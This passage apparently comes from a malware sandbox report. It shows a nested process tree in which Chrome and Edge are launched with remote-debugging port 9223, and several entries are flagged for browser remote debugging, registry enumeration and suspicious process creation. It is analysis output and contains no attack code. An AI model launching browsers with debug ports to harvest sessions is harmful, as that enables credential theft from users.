                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe6196cc40,0x7ffe6196cc4c,0x7ffe6196cc58
                                                    8⤵
                                                      PID:5080
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2068,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2064 /prefetch:2
                                                      8⤵
                                                        PID:4924
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2100 /prefetch:3
                                                        8⤵
                                                          PID:640
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2292 /prefetch:8
                                                          8⤵
                                                            PID:1200
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                                            8⤵
                                                            • Uses browser remote debugging
                                                            PID:3460
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                                                            8⤵
                                                            • Uses browser remote debugging
                                                            PID:5528
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:1
                                                            8⤵
                                                            • Uses browser remote debugging
                                                            PID:3768
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3712,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4676 /prefetch:8
                                                            8⤵
                                                              PID:3504
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8
                                                              8⤵
                                                                PID:4532
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4788 /prefetch:8
                                                                8⤵
                                                                  PID:4008
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5472,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5484 /prefetch:8
                                                                  8⤵
                                                                    PID:3680
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,16724245779186223103,10035025821015739690,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                                                                    8⤵
                                                                      PID:6532
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                    7⤵
                                                                    • Uses browser remote debugging
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    PID:1272
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffe619746f8,0x7ffe61974708,0x7ffe61974718
                                                                      8⤵
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:4620
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
                                                                      8⤵
                                                                        PID:6984
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                        8⤵
                                                                          PID:7004
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2588 /prefetch:2
                                                                          8⤵
                                                                            PID:7052
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
                                                                            8⤵
                                                                              PID:5308
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2380 /prefetch:2
                                                                              8⤵
                                                                                PID:6680
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
                                                                                8⤵
                                                                                • Uses browser remote debugging
                                                                                PID:6688
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
                                                                                8⤵
                                                                                • Uses browser remote debugging
                                                                                PID:6708
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2384 /prefetch:2
                                                                                8⤵
                                                                                  PID:6744
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2656 /prefetch:2
                                                                                  8⤵
                                                                                    PID:4788
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3748 /prefetch:2
                                                                                    8⤵
                                                                                      PID:4248
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3912 /prefetch:2
                                                                                      8⤵
                                                                                        PID:5980
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3612 /prefetch:2
                                                                                        8⤵
                                                                                          PID:6476
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16797139359027283554,1967197419521154373,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3980 /prefetch:2
                                                                                          8⤵
                                                                                            PID:6516
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                          7⤵
                                                                                          • Uses browser remote debugging
                                                                                          • Enumerates system info in registry
                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                          PID:4720
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffe619746f8,0x7ffe61974708,0x7ffe61974718
                                                                                            8⤵
                                                                                            • Checks processor information in registry
                                                                                            • Enumerates system info in registry
                                                                                            PID:5056
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
                                                                                            8⤵
                                                                                              PID:6352
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
                                                                                              8⤵
                                                                                                PID:6376
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:4144
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2852 /prefetch:2
                                                                                                  8⤵
                                                                                                    PID:1596
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                    8⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:4512
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                                                                                    8⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:1052
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2820 /prefetch:2
                                                                                                    8⤵
                                                                                                      PID:6504
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2
                                                                                                      8⤵
                                                                                                        PID:6600
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3548 /prefetch:2
                                                                                                        8⤵
                                                                                                          PID:5216
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2436 /prefetch:2
                                                                                                          8⤵
                                                                                                            PID:4104
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2444 /prefetch:2
                                                                                                            8⤵
                                                                                                              PID:396
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2852 /prefetch:2
                                                                                                              8⤵
                                                                                                                PID:2484
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,17783718731177163766,15799139177089283413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4200 /prefetch:2
                                                                                                                8⤵
                                                                                                                  PID:460
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                7⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                • Enumerates system info in registry
                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                PID:1952
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffe619746f8,0x7ffe61974708,0x7ffe61974718
                                                                                                                  8⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:3752
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
